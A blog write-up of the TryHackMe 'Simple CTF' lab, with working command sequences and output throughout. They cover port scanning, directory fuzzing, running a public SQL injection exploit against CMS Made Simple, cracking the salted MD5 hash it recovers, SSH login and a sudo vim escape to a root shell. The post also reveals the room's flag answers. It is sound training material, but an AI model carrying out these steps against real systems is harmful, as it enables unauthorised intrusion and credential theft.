---
layout: post
title: "Simple CTF - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - web
  - cve
  - sudo
date: 2021/02/10 20:10:00
thumbnail: /images/TryHackMe/easyctf.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Simple CTF
- **Profile:** [tryhackme.com](https://tryhackme.com/room/easyctf)
- **Difficulty:** Easy
- **Description**: Beginner level ctf

![Simple CTF](/images/TryHackMe/easyctf.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap exploitdb ffuf python2-termcolor haiti john
```

## Network enumeration
 
> How many services are running under port 1000?
 
Answer: {% spoiler 2 %}
 
Port & service scan with nmap:
 
```plaintext
# Nmap 7.91 scan initiated Wed Feb 10 14:41:44 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.168.133
Nmap scan report for 10.10.168.133
Host is up (0.037s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   closed http
2222/tcp open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 10 14:44:35 2021 -- 1 IP address (1 host up) scanned in 171.03 seconds
```
 
> What is running on the higher port?
 
Answer: {% spoiler ssh %}
 
OpenSSH is a SSH server.
 
## Web exploitation
 
> What's the CVE you're using against the application?
 
Answer: {% spoiler CVE-2019-9053 %}
 
OpenSSH 7.2p2 is a pretty old version.
We can search exploits on Exploid-DB with
 
```plaintext
$ searchsploit -s openssh 7.2p2
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
OpenSSH 7.2p2 - Username Enumeration                                               | linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration                                              | linux/remote/40113.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -p 40136
  Exploit: OpenSSH 7.2p2 - Username Enumeration
      URL: https://www.exploit-db.com/exploits/40136
     Path: /usr/share/exploitdb/exploits/linux/remote/40136.py
File Type: Python script, ASCII text executable, with CRLF line terminators
$ searchsploit -p 40113
  Exploit: OpenSSHd 7.2p2 - Username Enumeration
      URL: https://www.exploit-db.com/exploits/40113
     Path: /usr/share/exploitdb/exploits/linux/remote/40113.txt
File Type: ASCII text, with CRLF line terminators
$ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40113.txt
CVE-ID
CVE-2016-6210
$ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40136.py
# CVEs:                  CVE-2016-6210 (Credits for this go to Eddie Harari)
# Purpose:               User name enumeration against SSH daemons affected by CVE-2016-6210.
  if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
```
 
But I just understood I weren't supposed to look for a vulnerability targeting the
higher port service but that by "application" the author meant the "**web**
application".
 
So I quickly launched ffuf to find the app path:
 
```plaintext
$ ffuf -u http://10.10.168.133/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403
 
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
 
       v1.3.0-git
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.168.133/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,405
________________________________________________
 
index.html              [Status: 200, Size: 11321, Words: 3503, Lines: 376]
robots.txt              [Status: 200, Size: 929, Words: 176, Lines: 33]
.                       [Status: 200, Size: 11321, Words: 3503, Lines: 376]
```
 
There is one file that can help us: http://10.10.168.133/robots.txt
 
```plaintext
...
User-agent: *
Disallow: /
 
 
Disallow: /openemr-5_0_1_3
#
# End of "$Id: robots.txt 3494 2003-03-19 15:37:44Z mike $".
#
```
 
But it's a troll, nothing is there.
 
So I launched ffuf again to find another directory.
 
```plaintext
$ ffuf -u http://10.10.168.133/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -fc 403
 
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
 
       v1.3.0-git
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.168.133/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________
 
simple                  [Status: 301, Size: 315, Words: 20, Lines: 10]
                        [Status: 200, Size: 11321, Words: 3503, Lines: 376]
:: Progress: [26584/26584] :: Job [1/1] :: 1123 req/sec :: Duration: [0:00:27] :: Errors: 2 :
```
 
http://10.10.168.133/simple/ is hosting _CMS Made Simple_ app in version 2.2.8.
 
This version is vulnerable:
 
```plaintext
$ searchsploit -s cms made simple 2.2
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                | php/webapps/4810.txt
CMS Made Simple < 2.2.10 - SQL Injection                                            | php/webapps/46635.py
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                      | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                        | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)            | php/webapps/48851.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                        | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authentic | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                       | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                       | php/webapps/45793.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
 
$ searchsploit -p 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators
 
$ grep CVE- /usr/share/exploitdb/exploits/php/webapps/46635.py
```
 
> To what kind of vulnerability is the application vulnerable?
 
Answer: {% spoiler sqli %}
 
See previous steps.
 
> What's the password?
 
Answer: {% spoiler secret %}
 
Let's use the exploit:
 
```plaintext
$ python /usr/share/exploitdb/exploits/php/webapps/46635.py
  File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 25
    print "[+] Specify an url target"
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?
```
 
It's really a shame to create a python**2** exploit in 2019 but let's execute it anyway.
 
```plaintext
$ python2 /usr/share/exploitdb/exploits/php/webapps/46635.py
Traceback (most recent call last):
  File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 12, in <module>
    from termcolor import colored
ImportError: No module named termcolor
```
 
Lol, it seems that color was that really required for a PoC exploit to add
a dependency for it. Let's install it:
 
```plaintext
$ sudo pacman -S python2-termcolor --asdeps
```
 
This time it's ok.
 
```plaintext
$ python2 /usr/share/exploitdb/exploits/php/webapps/46635.py -u http://10.10.168.133/simple/ --crack -w /usr/share/wordlists/passwords/rockyou.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: edited
```
 
If we want to crack it ourslef (for the purpose of learning) we can check the
source code of the exploit:
 
```python
def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()
```
 
So if we check the extended entries of haiti we can find the corresponding
hashcat or JtR code:
 
```
$ haiti 0c01f4468bd75d7a84c7eb73846e8d96 -e
MD2 [JtR: md2]
MD5 [HC: 0] [JtR: raw-md5]
...
md5(md5(md5($pass))) [HC: 3500]
md5(strtoupper(md5($pass))) [HC: 4300]
md5(sha1($pass)) [HC: 4400]
md5($pass.$salt) [HC: 10]
md5($salt.$pass) [HC: 20]
md5(unicode($pass).$salt) [HC: 30]
md5($salt.unicode($pass)) [HC: 40]
...
md5(md5($salt).$pass) [HC: 3610]
md5($salt.md5($pass)) [HC: 3710]
md5($pass.md5($salt)) [HC: 3720]
md5($salt.$pass.$salt) [HC: 3810]
md5(md5($pass).md5($salt)) [HC: 3910]
md5($salt.md5($salt.$pass)) [HC: 4010]
md5($salt.md5($pass.$salt)) [HC: 4110]
md5($username.0.$pass) [HC: 4210]
...
```
 
It seems the hash is using this format `md5(salt + password)`.
It's code 20 for hashcat and there is no code for JtR.
There still is a solution for JtR but that has a limitation with the salt size
so let's verify it before.
 
```
$ irb
irb(main):001:0> '1dac0d92e9fa6bb2'.size
=> 16
```
 
In JtR we can use dynamic hash formats, the one we need is `dynamic_4` but
the salt size is limited to 24 bytes, here we have a 16 bytes one so it's ok.
 
```c
static DYNAMIC_Setup Setups[] =
{
  { "dynamic_0: md5($p) (raw-md5)",           _Funcs_0, _Preloads_0, _ConstDefault, MGF_NO_FLAG, MGF_KEYS_INPUT|MGF_SOURCE },
  { "dynamic_1: md5($p.$s) (joomla)",         _Funcs_1, _Preloads_1, _ConstDefault, MGF_SALTED, MGF_NO_FLAG, -32 },
  { "dynamic_2: md5(md5($p)) (e107)",         _Funcs_2, _Preloads_2, _ConstDefault, MGF_NO_FLAG, MGF_KEYS_INPUT|MGF_SET_INP2LEN32 },
  { "dynamic_3: md5(md5(md5($p)))",           _Funcs_3, _Preloads_3, _ConstDefault, MGF_NO_FLAG, MGF_KEYS_INPUT|MGF_SET_INP2LEN32 },
  { "dynamic_4: md5($s.$p) (OSC)",            _Funcs_4, _Preloads_4, _ConstDefault, MGF_SALTED, MGF_NO_FLAG, -24  },
  { "dynamic_5: md5($s.$p.$s)",               _Funcs_5, _Preloads_5, _ConstDefault, MGF_SALTED, MGF_NO_FLAG, -12, 31, 56  },
  { "dynamic_6: md5(md5($p).$s)",             _Funcs_6, _Preloads_6, _ConstDefault, MGF_SALTED, MGF_KEYS_BASE16_IN1_MD5, -23, 55, 110 },
```
 
Ref. [src/dynamic_preloads.c#L3247-L3255](https://github.com/openwall/john/blob/ae2371dff05ec4ff1439ffc953146da6b8668c82/src/dynamic_preloads.c#L3247-L3255)
 
We can prepare hash text file for JtR:
 
```plaintext
mitch:$dynamic_4$0c01f4468bd75d7a84c7eb73846e8d96$1dac0d92e9fa6bb2
```
 
Now we can crack it with the `dynamic_4` profile:
 
```plaintext
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=dynamic_4
Using default input encoding: UTF-8
Loaded 1 password hash (dynamic_4 [md5($s.$p) (OSC) 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
edited           (mitch)
1g 0:00:00:00 DONE (2021-02-10 16:47) 25.00g/s 42000p/s 42000c/s 42000C/s 123456..kenny
Use the "--show --format=dynamic_4" options to display all of the cracked passwords reliably
Session completed
```
 
## System access
 
> Where can you login with the details obtained?
 
Answer: {% spoiler ssh %}
 
Seems we can:
 
```plaintext
$ ssh mitch@10.10.168.133 -p 2222
The authenticity of host '[10.10.168.133]:2222 ([10.10.168.133]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.168.133]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.168.133's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
0 packages can be updated.
0 updates are security updates.
 
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ id
uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)
```
 
> What's the user flag?
 
Answer: {% spoiler G00d j0b, keep up! %}
 
`cat user.txt`
 
## System exploitation
 
> Is there any other user in the home directory? What's its name?
 
Answer: {% spoiler sunbath %}
 
```plaintext
$ ls /home
mitch  sunbath
```
 
## Elevation of privilege (EoP)
 
> What can you leverage to spawn a privileged shell?
 
Answer: {% spoiler vim %}
 
Yes, using sudo.
 
```plaintext
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
 
$ sudo /usr/bin/vim
:/bin/bash
```
 
> What's the root flag?
 
Answer: {% spoiler `W3ll d0n3. You made it!` %}
 
```plaintext
root@Machine:~# cat /root/root.txt
```
